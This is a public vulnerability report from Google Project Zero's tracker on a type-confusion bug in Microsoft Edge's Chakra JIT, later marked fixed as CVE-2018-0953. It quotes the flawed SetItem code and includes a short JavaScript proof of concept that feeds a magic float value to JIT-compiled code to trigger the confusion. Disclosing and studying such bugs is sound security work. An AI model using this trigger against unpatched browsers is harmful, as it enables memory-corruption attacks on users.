New issue
Advanced search Search tips

Issue 1531 link

Starred by 3 users

Issue metadata

Status: Fixed
Owner:
Closed: May 17
Cc:



Sign in to add a comment

Microsoft Edge: Chakra: JIT: Magic value can cause type confusion

Project Member Reported by lokihardt@google.com, Feb 19 2018

Issue description

BOOL JavascriptNativeFloatArray::SetItem(uint32 index, double dValue)
{
    if (*(uint64*)&dValue == *(uint64*)&JavascriptNativeFloatArray::MissingItem)
    {
        JavascriptArray *varArr = JavascriptNativeFloatArray::ToVarArray(this);
        varArr->DirectSetItemAt(index, JavascriptNumber::ToVarNoCheck(dValue, GetScriptContext()));
        return TRUE;
    }

    this->DirectSetItemAt<double>(index, dValue);
    return TRUE;
}

As you can see above, if the double value given as the parameter equals to JavascriptNativeFloatArray::MissingItem, it converts the float array to a var array. Since the input value is not checked in the JITed code, it can lead to type confusion.

function opt(arr, value) {
    arr[1] = value;
    arr[0] = 2.3023e-320;
}

function main() {
    for (let i = 0; i < 0x10000; i++)
        opt([1.1], 2.2);

    let arr = [1.1];
    opt(arr, -5.3049894784e-314);  // MAGIC VALUE!

    print(arr);
}

main();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Project Member

Comment 1 by lokihardt@google.com, May 17

Status: Fixed (was: New)

Comment 2 Deleted

Project Member

Comment 3 by lokihardt@google.com, May 17

Description: Show this description
Project Member

Comment 4 by lokihardt@google.com, May 21

Labels: -Restrict-View-Commit CVE-2018-0953

Sign in to add a comment